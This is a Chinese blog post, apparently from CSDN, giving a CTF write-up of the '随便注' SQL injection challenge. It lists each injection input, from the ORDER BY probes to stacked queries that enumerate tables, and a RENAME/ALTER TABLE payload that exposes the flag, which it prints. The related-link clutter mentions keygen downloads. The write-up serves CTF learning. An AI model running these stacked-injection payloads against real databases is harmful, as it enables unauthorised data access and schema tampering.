web 4.随便注

最新推荐文章于 2022-12-05 19:42:01 发布
最新推荐文章于 2022-12-05 19:42:01 发布
阅读量153 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yu_jing_hong/article/details/119790108
版权

首先,判断是否存在注入,若输入1'发现不回显,输入1'#显示回显正常,那么就存在注入

 

 然后判断注入是字符型还是数字型,输入1'or'1'=1回显正常,那么该注入应该是字符型

 第二步,猜解SQL查询语句中的字段数

输入1'order by 1#回显正常

 再输入1'order by 2#,回显正常

直到输入1'order by 3#显示错误,那么字段数就有两个

第三步,显示字段,输入1'union select 1,2#回显一个正则过滤规则

 过滤了select,update,delete,drop,insert,where,.这些词,尝试堆叠注入

第四步,查询数据库,输入1';show datebase;#成功回显,说明存在堆叠注入

第五步,查询表,输入1';show tables;#成功回显,得到两个表words和1919810931114514

 第六步,查询表中字段,输入1';show columns from`words`;#

 再输入1';show columns from `1919810931114514`;#

 看到有flag字段

最后一步就是获取flag了,看到这里有两张表,那回显内容肯定是从word这张表里回显的,我们要让它回显flag所在的表中。既然没有过滤alert和rename,那么我们可以把表改个名字,再给列也改个名字。

先把words改名为word1,再把1919810931114514表改名为words,再把新的words表里的flag列改名为id.

payload:

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#

在输入1'or'1'='1#查询就可以得到flag

 

flag{fd5cd530-c9f0-4e99-9232-e73c29a2ae1d}

 

yu_jing_hong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB-4-网络原理
feng25751006的博客
06-09 544
网络原理初识
web4
WYJ____的博客
08-13 437
查看源代码 用浏览器打开的结果是 或者
bugku Web4
rommel的博客
08-01 3828
首先进入题面就是常见的提交框,老规矩直接查看源代码 在这里我们发现了有个js它定义了两个变量并采用eval函数算一些什么东西 var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2
Web5到底是什么?Web4去哪了?
xingxincsdn的博客
12-05 1973
Web3咱还没搞明白,Web3还没有完全的投入应用 ,这Web5怎么就来了?
BUUCTF-web-随便
nareku的博客
07-06 1171
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
Wildpackets Omnipeek 10.0.1 64X+册机.part4.rar
01-03
4.输入email ,请随便填写,但需要符合xxx@xxx.com的格式 5.开启破解软件,在version 输入100,点击Generate 6.将破解软件中的serial number 填入安装程序中的 serial number :是serial number 不是activation ...
Wildpackets Omnipeek 10.0.1 32X+册机.part4.rar
01-03
4.输入email ,请随便填写,但需要符合xxx@xxx.com的格式 5.开启破解软件,在version 输入100,点击Generate 6.将破解软件中的serial number 填入安装程序中的 serial number :是serial number 不是activation ...
Xfire配置Web Service+Spring+Hibernate详细流程及补充+测试实例.rar
10-13
:之所以有此补充是因为看完了原文之后发现虽然可用但是hiberante获取bean时无法得到上下文. invalid SOAP request: 当在浏览其中报此错误的时候,实际上是因为WebService针对的是客户端请求,而不是浏览器的访问. ...
Wildpackets Omnipeek 10.0.1 64X+册机.part2.rar
01-03
4.输入email ,请随便填写,但需要符合xxx@xxx.com的格式 5.开启破解软件,在version 输入100,点击Generate 6.将破解软件中的serial number 填入安装程序中的 serial number :是serial number 不是activation ...
Web1.0时期进入Web3.0时代,即将跨入Web4.0时代
weixin_66455621的博客
02-09 4416
网站的功能性现在已经彻底地变革,我们经历过的一种巨大的转变,就是网站从“静态内容”的展示转向“动态内容”的传递,从早期的Web1.0时期进入Web2.0时代。所谓“动态”,并不是指有几个放在网页上的GIF动态图片或Flash等。区别动态网站与静态网站最基本的方法通常是区别是否基于数据库的开发模式,也就是网页是固定内容还是可在线更新内容。Web2.0是相对Web1.0的新的一类互联网应用的统称。Web1.0的主要特点在于用户通过浏览器获取信息。Web2.0则更重用户的交互作用,用户既是网站内容的...
Web4.0 是啥样子
savagesong2006的博客
09-03 3596
“如果你认为区块链改变世界,那你的世界太小了。“
CSS入门基础知识(八)——CSS的背景
qq_46678602的博客
11-03 350
CSS标签入门基础知识 CSS的背景 通过css背景属性,可以给页面元素添加背景样式。 背景属性可以设置背景颜色、背景图片、背景平铺、背景图片位置、背景图像固定等。 背景颜色 background-color属性定义了元素的背景颜色 一般情况下元素背景颜色默认值是tranparent(透明) 背景图片 ...
BUUCTF web随便
good good study
11-21 2208
启动靶场访问如下,输入1',报错,可知是字符型入,变量由单引号包裹输入1' and 1=1 --+,显示正常先直接用sqlmap入一下,显示存在入,但是始终入不出来数据库,“[ERROR] unable to retrieve the number of databases”,猜想应该是存在字符过滤因为现在还不知道是什么原因导致的sqlmap入不出来,所以先尝试手。输入框中输入1和2显示的结果不同,像这种直接回显输入的最先尝试联合入。
buucrf-web-随便
weixin_43345082的博客
08-16 981
又学到个姿势 这道题是sql堆叠入 堆叠入自行百度 同时有过滤 做法是使用mysql预定义语句 PREPARE stmt from '你的sql语句'; EXECUTE stmt (如果sql有参数的话, USING xxx,xxx); // 这里USING的只能是会话变量 DEALLOCATE PREPARE stmt; 这三句话分别就是: 预定义好sql语句 执行预定义的sql 释放...
【Writeup】BUUCTF_Web_随便
BAKUMANSEC - Just Do It
08-14 4454
【Writeup】BUUCTF_Web_随便 0x01 解题思路 打开页面,显然考点是SQL入: 手工测试一下: ​ ​ ?inject=' ​ ​ ?inject=' or 1# ​ ​ ?inject=' or 0# 可以进行基于布尔的盲释里有这么一句话: 先用sqlmap常规扫描试试: sqlmap identified the following in...
web学习11-javaweb4(过滤器监听器)
weixin_45150516的博客
03-23 634
目录10、过滤器与监听器10.1、过滤器10.2、创建一个过滤器的基本步骤10.3、过滤器链的执行顺序 10、过滤器与监听器 10.1、过滤器 过滤器是向 Web 应用程序的请求和响应处理添加功能的Web服务组件。 Servlet 过 滤 器 是 在 Java Servlet 规 范 2.3 中 定 义 的它 能 够 对Servlet容器的请求和响应对象进行检 查和修改。 Servlet过滤器本身并不生成请求和响应对象,它只提供过滤作用 Servlet过滤器能够在Servlet被调用之前检查Request
CTFshow web入门 web4
weixin_45990644的博客
07-07 705
CTFshow web入门 web4 题目提示robots,看了些文章反应过来时是关于robots的协议问题,利用“robots.txt”来进行查看链接: 打开之后发现这些代码,百度了一下是些Roberts协议。 User-agent: * 表示所有的搜索引擎种类,*是一个通配符。 Disallow: /flagishere.txt表示是禁止爬取名为flagishere的txt文件。 本着实验的心态在链接后面加了/flagishere.txt试了试,最后得到了flag 。 补充 因为之前没有接触过爬虫,
system.web.webpages.deployment
最新发布
12-08
system.web.webpages.deployment是一个命名空间,它在ASP.NET Web Pages应用程序中提供了一些功能和类,用于部署和配置应用程序。 这个命名空间包含了一些重要的类,例如: - PreApplicationStartCode类:它提供了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值